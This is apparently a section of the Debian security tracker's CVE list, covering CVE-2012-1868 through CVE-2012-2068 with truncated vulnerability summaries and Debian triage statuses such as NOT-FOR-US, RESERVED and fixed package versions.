CVE-2012-2068 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2067 (Unspecified vulnerability in the CKeditor module 6.x-2.x before ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2066 (Cross-site scripting (XSS) vulnerability in the FCKeditor module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2065 (Cross-site scripting (XSS) vulnerability in the Language Icons module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2064 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2063 (The Slidebox module before 7.x-1.4 for Drupal does not properly check ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2062 (Open redirect vulnerability in the Redirecting click bouncer module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2061 (Cross-site request forgery (CSRF) vulnerability in the Admin tools ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2060 (Cross-site scripting (XSS) vulnerability in the Admin tools module for ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2059 (Cross-site scripting (XSS) vulnerability in the ticketyboo News Ticker ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2058 (The Ubercart Payflow module for Drupal does not use a secure token, ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2057 (Cross-site request forgery (CSRF) vulnerability in the Ubercart Bulk ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2056 (Cross-site request forgery (CSRF) vulnerability in the Content Lock ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2008-7311 (The session cookie store implementation in Spree 0.2.0 uses a ...)
	NOT-FOR-US: Spree
CVE-2008-7310 (Spree 0.2.0 does not properly restrict the use of a hash to provide ...)
	NOT-FOR-US: Spree
CVE-2008-7309 (Insoshi before 20080920 does not properly restrict the use of a hash ...)
	NOT-FOR-US: Insoshi
CVE-2012-2055 (GitHub Enterprise before 20120304 does not properly restrict the use ...)
	NOT-FOR-US: GitHub Enterprise
CVE-2012-2054 (Redmine before 1.3.2 does not properly restrict the use of a hash to ...)
	- redmine 1.3.2+dfsg1-1
CVE-2012-2053 (The sudoers file in the Linux system configuration in F5 FirePass ...)
	NOT-FOR-US: F5 Firepass
CVE-2012-2052
	RESERVED
CVE-2012-2051 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...)
	NOT-FOR-US: Adobe Reader
CVE-2012-2050 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x ...)
	NOT-FOR-US: Adobe Reader
CVE-2012-2049 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before ...)
	NOT-FOR-US: Adobe Reader
CVE-2012-2048 (Unspecified vulnerability in Adobe ColdFusion 10 and earlier allows ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2012-2047 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2046 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2045 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2044 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2043 (Adobe Shockwave Player before 11.6.6.636 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2042 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...)
	NOT-FOR-US: Adobe Illustrator
CVE-2012-2041 (CRLF injection vulnerability in the Component Browser in Adobe ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2012-2040 (Untrusted search path vulnerability in the installer in Adobe Flash ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-2039 (Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-2038 (Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-2037 (Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-2036 (Integer overflow in Adobe Flash Player before 10.3.183.20 and 11.x ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-2035 (Stack-based buffer overflow in Adobe Flash Player before 10.3.183.20 ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-2034 (Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-2033 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2032 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2031 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2030 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2029 (Adobe Shockwave Player before 11.6.5.635 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2012-2028 (Buffer overflow in Adobe Photoshop before CS6 allows remote attackers ...)
	NOT-FOR-US: Adobe Photoshop
CVE-2012-2027 (Use-after-free vulnerability in Adobe Photoshop before CS6 allows ...)
	NOT-FOR-US: Adobe Photoshop
CVE-2012-2026 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...)
	NOT-FOR-US: Adobe Illustrator
CVE-2012-2025 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...)
	NOT-FOR-US: Adobe Illustrator
CVE-2012-2024 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...)
	NOT-FOR-US: Adobe Illustrator
CVE-2012-2023 (Adobe Illustrator before CS6 allows attackers to execute arbitrary ...)
	NOT-FOR-US: Adobe Illustrator
CVE-2012-2022 (Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node ...)
	NOT-FOR-US: HP Network Node Manager
CVE-2012-2021 (Multiple cross-site scripting (XSS) vulnerabilities in HP AssetManager ...)
	NOT-FOR-US: HP AssetManager
CVE-2012-2020 (Unspecified vulnerability in HP Operations Agent before 11.03.12 ...)
	NOT-FOR-US: HP Operations Agent
CVE-2012-2019 (Unspecified vulnerability in HP Operations Agent before 11.03.12 ...)
	NOT-FOR-US: HP Operations Agent
CVE-2012-2018 (Cross-site scripting (XSS) vulnerability in HP Network Node Manager i ...)
	NOT-FOR-US: HP Network Node Manager
CVE-2012-2017 (Unspecified vulnerability on HP Photosmart Wireless e-All-in-One B110, ...)
	NOT-FOR-US: HP Photosmart Wireless e-All-in-One
CVE-2012-2016 (Unspecified vulnerability in HP System Management Homepage (SMH) ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2012-2015 (Unspecified vulnerability in HP System Management Homepage (SMH) ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2012-2014 (HP System Management Homepage (SMH) before 7.1.1 does not properly ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2012-2013 (Unspecified vulnerability in HP System Management Homepage (SMH) ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2012-2012 (HP System Management Homepage (SMH) before 7.1.1 does not have an off ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2012-2011 (Multiple cross-site scripting (XSS) vulnerabilities in HP Web Jetadmin ...)
	NOT-FOR-US: HP Web Jetadmin
CVE-2012-2010 (The ACMELOGIN implementation in HP OpenVMS 8.3 and 8.4 on the Alpha ...)
	NOT-FOR-US: OpenVMS
CVE-2012-2009 (Unspecified vulnerability in HP Performance Insight for Networks ...)
	NOT-FOR-US: HP Performance Insight
CVE-2012-2008 (Cross-site scripting (XSS) vulnerability in HP Performance Insight for ...)
	NOT-FOR-US: HP Performance Insight
CVE-2012-2007 (SQL injection vulnerability in HP Performance Insight for Networks ...)
	NOT-FOR-US: HP Performance Insight
CVE-2012-2006 (Unspecified vulnerability in HP Insight Management Agents before ...)
	NOT-FOR-US: Proprietary HP monitoring tools
CVE-2012-2005 (Cross-site scripting (XSS) vulnerability in HP Insight Management ...)
	NOT-FOR-US: Proprietary HP monitoring tools
CVE-2012-2004 (Open redirect vulnerability in HP Insight Management Agents before ...)
	NOT-FOR-US: Proprietary HP monitoring tools
CVE-2012-2003 (Cross-site request forgery (CSRF) vulnerability in HP Insight ...)
	NOT-FOR-US: Proprietary HP monitoring tools
CVE-2012-2002 (Open redirect vulnerability in HP SNMP Agents for Linux before 9.0.0 ...)
	NOT-FOR-US: Proprietary HP monitoring tools
CVE-2012-2001 (Cross-site scripting (XSS) vulnerability in HP SNMP Agents for Linux ...)
	NOT-FOR-US: Proprietary HP monitoring tools
CVE-2012-2000 (Multiple unspecified vulnerabilities in HP System Health Application ...)
	NOT-FOR-US: Proprietary HP monitoring tools
CVE-2012-1999 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...)
	NOT-FOR-US: HP Systems Insight Manager
CVE-2012-1998 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...)
	NOT-FOR-US: HP Systems Insight Manager
CVE-2012-1997 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...)
	NOT-FOR-US: HP Systems Insight Manager
CVE-2012-1996 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...)
	NOT-FOR-US: HP Systems Insight Manager
CVE-2012-1995 (Unspecified vulnerability in HP Systems Insight Manager (SIM) before ...)
	NOT-FOR-US: HP Systems Insight Manager
CVE-2012-1994
	RESERVED
CVE-2012-1993 (Unspecified vulnerability in HP System Management Homepage (SMH) ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2012-1992 (Cross-site scripting (XSS) vulnerability in admin/edituser.php in CMS ...)
	NOT-FOR-US: CMS Made Simple
CVE-2012-1991
	RESERVED
CVE-2012-1990 (Multiple cross-site scripting (XSS) vulnerabilities in Schneider ...)
	NOT-FOR-US: Schneider Electric Kerweb
CVE-2012-1989 (telnet.rb in Puppet 2.7.x before 2.7.13 and Puppet Enterprise (PE) ...)
	- puppet 2.7.13-1
	[squeeze] - puppet (Only affects 2.7.x)
CVE-2012-1988 (Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet ...)
	{DSA-2451-1}
	- puppet 2.7.13-1
CVE-2012-1987 (Unspecified vulnerability in Puppet 2.6.x before 2.6.15 and 2.7.x ...)
	{DSA-2451-1}
	- puppet 2.7.13-1
CVE-2012-1986 (Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet ...)
	{DSA-2451-1}
	- puppet 2.7.13-1
CVE-2011-5085 (Unspecified vulnerability in Movable Type 4.x before 4.36 and 5.x ...)
	{DSA-2423-1}
	- movabletype-opensource 5.1.2+dfsg-1
CVE-2011-5084 (Cross-site scripting (XSS) vulnerability in Movable Type 4.x before ...)
	{DSA-2423-1}
	- movabletype-opensource 5.1.2+dfsg-1
CVE-2012-1985 (Cross-site request forgery (CSRF) vulnerability in RealNetworks Helix ...)
	NOT-FOR-US: RealNetworks Helix
CVE-2012-1984 (Multiple cross-site scripting (XSS) vulnerabilities in RealNetworks ...)
	NOT-FOR-US: RealNetworks Helix
CVE-2012-1983
	RESERVED
CVE-2012-1982 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: SocialCMS
CVE-2012-1981
	RESERVED
CVE-2012-1980
	RESERVED
CVE-2012-1979 (Cross-site scripting (XSS) vulnerability in starnet/index.php in ...)
	NOT-FOR-US: SyndeoCMS
CVE-2012-1978
	RESERVED
CVE-2012-1977 (WellinTech KingSCADA 3.0 uses a cleartext base64 format for storage of ...)
	NOT-FOR-US: WellinTech KingSCADA
CVE-2012-1976 (Use-after-free vulnerability in the ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-1975 (Use-after-free vulnerability in the PresShell::CompleteMove function ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-1974 (Use-after-free vulnerability in the gfxTextRun::CanBreakLineBefore ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-1973 (Use-after-free vulnerability in the nsObjectLoadingContent::LoadObject ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-1972 (Use-after-free vulnerability in the ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-1971 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel (Only affects Firefox >= 10)
CVE-2012-1970 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- iceape 2.7.7-1
CVE-2012-1969 (The get_attachment_link function in Template.pm in Bugzilla 2.x and ...)
	- bugzilla (low)
	- bugzilla4 (bug #669643)
	[squeeze] - bugzilla (Minor issue)
CVE-2012-1968 (Bugzilla 4.1.x and 4.2.x before 4.2.2 and 4.3.x before 4.3.2 uses ...)
	- bugzilla (Only affects 4.1 to 4.3)
	- bugzilla4 (bug #669643)
CVE-2012-1967 (Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, ...)
	{DSA-2528-1 DSA-2514-1 DSA-2513-1}
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
CVE-2012-1966 (Mozilla Firefox 4.x through 13.0 and Firefox ESR 10.x before 10.0.6 do ...)
	{DSA-2514-1}
	- iceweasel 10.0.6esr-1
CVE-2012-1965 (Mozilla Firefox 4.x through 13.0 and Firefox ESR 10.x before 10.0.6 do ...)
	- iceweasel 10.0.6esr-1
CVE-2012-1964 (The certificate-warning functionality in ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1963 (The Content Security Policy (CSP) functionality in Mozilla Firefox 4.x ...)
	- iceweasel 10.0.6esr-1
	[squeeze] - iceweasel (CSP not yet available)
	- icedove 10.0.5-1
	[squeeze] - icedove (CSP not yet available)
	- icedove 10.0.6-1
	- iceape 2.7.6-1
CVE-2012-1962 (Use-after-free vulnerability in the JSDependentString::undepend ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1961 (Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1960 (The qcms_transform_data_rgb_out_lut_sse2 function in the QCMS ...)
	- iceweasel (Only affects Firefox > 10)
CVE-2012-1959 (Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1958 (Use-after-free vulnerability in the nsGlobalWindow::PageHidden ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1957 (An unspecified parser-utility class in Mozilla Firefox 4.x through ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1956 (Mozilla Firefox before 15.0, Thunderbird before 15.0, and SeaMonkey ...)
	- iceweasel (Only affects Firefox >= 10)
	- icedove (Only affects Firefox >= 10)
	- iceape (Only affects Firefox >= 10)
CVE-2012-1955 (Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1954 (Use-after-free vulnerability in the nsDocument::AdoptNode function in ...)
	{DSA-2528-1 DSA-2514-1 DSA-2513-1}
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
CVE-2012-1953 (The ElementAnimations::EnsureStyleRuleFor function in Mozilla Firefox ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1952 (The nsTableFrame::InsertFrames function in Mozilla Firefox 4.x through ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1951 (Use-after-free vulnerability in the nsSMILTimeValueSpec::IsEventBased ...)
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceape (Vulnerable code not present)
CVE-2012-1950 (The drag-and-drop implementation in Mozilla Firefox 4.x through 13.0 ...)
	{DSA-2528-1 DSA-2514-1}
	- iceweasel 10.0.6esr-1
CVE-2012-1949 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel (Only affects Firefox 13)
CVE-2012-1948 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	{DSA-2528-1 DSA-2514-1 DSA-2513-1}
	- iceweasel 10.0.6esr-1
	- icedove 10.0.6-1
	- iceape 2.7.6-1
CVE-2012-1947 (Heap-based buffer overflow in the utf16_to_isolatin1 function in ...)
	{DSA-2499-1 DSA-2489-1 DSA-2488-1}
	- iceweasel 10.0.5esr-1
	- icedove 10.0.5-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
CVE-2012-1946 (Use-after-free vulnerability in the nsINode::ReplaceOrInsertBefore ...)
	- iceweasel 10.0.5esr-1
	- icedove 10.0.5-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
CVE-2012-1945 (Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, ...)
	- iceweasel 10.0.5esr-1
	- icedove 10.0.5-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
CVE-2012-1944 (The Content Security Policy (CSP) implementation in Mozilla Firefox ...)
	- iceweasel 10.0.5esr-1
	[squeeze] - iceweasel (CSP not yet available)
	- icedove 10.0.5-1
	[squeeze] - icedove (CSP not yet available)
CVE-2012-1943 (Untrusted search path vulnerability in Updater.exe in the Windows ...)
	- iceweasel (windows-specific)
CVE-2012-1942 (The Mozilla Updater and Windows Updater Service in Mozilla Firefox ...)
	- iceweasel (windows-specific)
CVE-2012-1941 (Heap-based buffer overflow in the ...)
	- iceweasel 10.0.5esr-1
	- icedove 10.0.5-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
CVE-2012-1940 (Use-after-free vulnerability in the nsFrameList::FirstChild function ...)
	{DSA-2499-1 DSA-2489-1 DSA-2488-1}
	- iceweasel 10.0.5esr-1
	- icedove 10.0.5-1
CVE-2012-1939 (jsinfer.cpp in Mozilla Firefox ESR 10.x before 10.0.5 and Thunderbird ...)
	- iceweasel 10.0.5esr-1
	- icedove 10.0.5-1
	[squeeze] - iceweasel (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
CVE-2012-1938 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel (Only affects iceweasel from experimental)
CVE-2012-1937 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	{DSA-2499-1 DSA-2489-1 DSA-2488-1}
	- iceweasel 10.0.5esr-1
	- icedove 10.0.5-1
CVE-2012-1936 (** DISPUTED ** The wp_create_nonce function in ...)
	NOT-FOR-US: Disputed Wordpress issue
CVE-2012-1935 (Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 3.5.x ...)
	- newscoop (bug #604113)
CVE-2012-1934 (SQL injection vulnerability in admin/country/edit.php in Newscoop ...)
	- newscoop (bug #604113)
CVE-2012-1933 (Multiple PHP remote file inclusion vulnerabilities in Newscoop 3.5.x ...)
	- newscoop (bug #604113)
CVE-2012-1932
	RESERVED
CVE-2007-6753 (Untrusted search path vulnerability in Shell32.dll in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1931 (Opera before 11.62 on UNIX, when used in conjunction with an ...)
	NOT-FOR-US: Opera
CVE-2012-1930 (Opera before 11.62 on UNIX uses world-readable permissions for ...)
	NOT-FOR-US: Opera
CVE-2012-1929 (Opera before 11.62 on Mac OS X allows remote attackers to spoof the ...)
	NOT-FOR-US: Opera
CVE-2012-1928 (Opera before 11.62 allows remote attackers to spoof the address field ...)
	NOT-FOR-US: Opera
CVE-2012-1927 (Opera before 11.62 allows remote attackers to spoof the address field ...)
	NOT-FOR-US: Opera
CVE-2012-1926 (Opera before 11.62 allows remote attackers to bypass the Same Origin ...)
	NOT-FOR-US: Opera
CVE-2012-1925 (Opera before 11.62 does not ensure that a dialog window is placed on ...)
	NOT-FOR-US: Opera
CVE-2012-1924 (Opera before 11.62 allows user-assisted remote attackers to trick ...)
	NOT-FOR-US: Opera
CVE-2012-1923 (RealNetworks Helix Server and Helix Mobile Server 14.x before 14.3.x ...)
	NOT-FOR-US: RealNetworks Helix
CVE-2012-1922 (Multiple cross-site request forgery (CSRF) vulnerabilities in Sitecom ...)
	NOT-FOR-US: Sitecom WLM-2501
CVE-2012-1921 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: Sitecom
CVE-2012-1920 (@Mail WebMail Client in AtMail Open-Source 1.04 and earlier allows ...)
	NOT-FOR-US: AtMail
CVE-2012-1919 (CRLF injection vulnerability in mime.php in @Mail WebMail Client in ...)
	NOT-FOR-US: AtMail
CVE-2012-1918 (Multiple directory traversal vulnerabilities in (1) compose.php and ...)
	NOT-FOR-US: AtMail
CVE-2012-1917 (compose.php in @Mail WebMail Client in AtMail Open-Source before 1.05 ...)
	NOT-FOR-US: AtMail
CVE-2012-1916 (@Mail WebMail Client in AtMail Open-Source before 1.05 allows remote ...)
	NOT-FOR-US: AtMail
CVE-2007-6752 (** DISPUTED ** Cross-site request forgery (CSRF) vulnerability in ...)
	- drupal7 (unimportant)
CVE-2012-1915
	RESERVED
CVE-2012-1914
	RESERVED
CVE-2012-1913
	REJECTED
CVE-2012-1912 (Cross-site scripting (XSS) vulnerability in preferences.php in PHP ...)
	NOT-FOR-US: PHP Address Book
CVE-2012-1911 (Multiple SQL injection vulnerabilities in PHP Address Book 6.2.12 and ...)
	NOT-FOR-US: PHP Address Book
CVE-2012-1910 (Bitcoin-Qt 0.5.0.x before 0.5.0.5; 0.5.1.x, 0.5.2.x, and 0.5.3.x ...)
	- bitcoin (windows-only, qt gui not built)
CVE-2012-1909 (The Bitcoin protocol, as used in bitcoind before 0.4.4, wxBitcoin, ...)
	- bitcoin 0.6.0-1
CVE-2012-1908 (Cross-site scripting (XSS) vulnerability in Splunk 4.0 through 4.3 ...)
	NOT-FOR-US: Splunk
CVE-2012-1907 (The scanner engine in PrivaWall Antivirus 5.6 and earlier does not ...)
	NOT-FOR-US: PrivaWall Antivirus
CVE-2012-1906 (Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet ...)
	{DSA-2451-1}
	- puppet 2.7.13-1
CVE-2012-1905
	RESERVED
CVE-2012-1904 (mp4fformat.dll in the QuickTime File Format plugin in RealNetworks ...)
	NOT-FOR-US: RealPlayer
CVE-2012-1903
	RESERVED
CVE-2012-1902 (show_config_errors.php in phpMyAdmin 3.4.x before 3.4.10.2, when a ...)
	- phpmyadmin 4:3.4.10.2-1 (unimportant)
CVE-2012-1901 (Multiple cross-site request forgery (CSRF) vulnerabilities in FlexCMS ...)
	NOT-FOR-US: FlexCMS
CVE-2012-1900 (Cross-site request forgery (CSRF) vulnerability in admin/index.php in ...)
	NOT-FOR-US: RazorCMS
CVE-2012-1899 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Webfolio CMS
CVE-2012-1898 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Wolf CMS
CVE-2012-1897 (Multiple cross-site request forgery (CSRF) vulnerabilities in Wolf CMS ...)
	NOT-FOR-US: Wolf CMS
CVE-2012-1586 (mount.cifs in cifs-utils 2.6 allows local users to determine the ...)
	- cifs-utils 2:5.3-2 (low; bug #665923)
	[squeeze] - cifs-utils (Minor issue)
CVE-2012-1896 (Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly consider ...)
	NOT-FOR-US: Microsoft .NET Framework
CVE-2012-1895 (The reflection implementation in Microsoft .NET Framework 1.0 SP3, 1.1 ...)
	NOT-FOR-US: Microsoft .NET Framework
CVE-2012-1894 (Microsoft Office for Mac 2011 uses world-writable permissions for the ...)
	NOT-FOR-US: Microsoft Office
CVE-2012-1893 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1892 (Cross-site scripting (XSS) vulnerability in Microsoft Visual Studio ...)
	NOT-FOR-US: Microsoft Visual Studio Team Foundation Server
CVE-2012-1891 (Heap-based buffer overflow in Microsoft Data Access Components (MDAC) ...)
	NOT-FOR-US: Microsoft Data Access Components
CVE-2012-1890 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-1889 (Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses ...)
	NOT-FOR-US: Microsoft XML Core Services
CVE-2012-1888 (Buffer overflow in Microsoft Visio 2010 SP1 and Visio Viewer 2010 SP1 ...)
	NOT-FOR-US: Microsoft Visio
CVE-2012-1887 (Use-after-free vulnerability in Microsoft Excel 2003 SP3, 2007 SP2 and ...)
	NOT-FOR-US: Microsoft Excel
CVE-2012-1886 (Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1; Excel ...)
	NOT-FOR-US: Microsoft Excel
CVE-2012-1885 (Heap-based buffer overflow in Microsoft Excel 2003 SP3, 2007 SP2 and ...)
	NOT-FOR-US: Microsoft Excel
CVE-2012-1884
	RESERVED
CVE-2012-1883
	RESERVED
CVE-2012-1882 (Microsoft Internet Explorer 6 through 9 does not block cross-domain ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1881 (Microsoft Internet Explorer 8 and 9 does not properly handle objects ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1880 (Microsoft Internet Explorer 6 through 9 does not properly handle ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1879 (Microsoft Internet Explorer 6 through 9 does not properly handle ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1878 (Microsoft Internet Explorer 6 through 9 does not properly handle ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1877 (Microsoft Internet Explorer 6 through 9 does not properly handle ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1876 (Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1875 (Microsoft Internet Explorer 8 does not properly handle objects in ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1874 (Microsoft Internet Explorer 8 and 9 does not properly handle objects ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1873 (Microsoft Internet Explorer 7 through 9 does not properly create and ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1872 (Cross-site scripting (XSS) vulnerability in Microsoft Internet ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-1871
	RESERVED
CVE-2012-1870 (The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 ...)
	NOT-FOR-US: Microsoft Windows XP
CVE-2012-1869
	RESERVED
CVE-2012-1868 (Race condition in the thread-creation implementation in win32k.sys in ...)
	NOT-FOR-US: Microsoft Windows XP
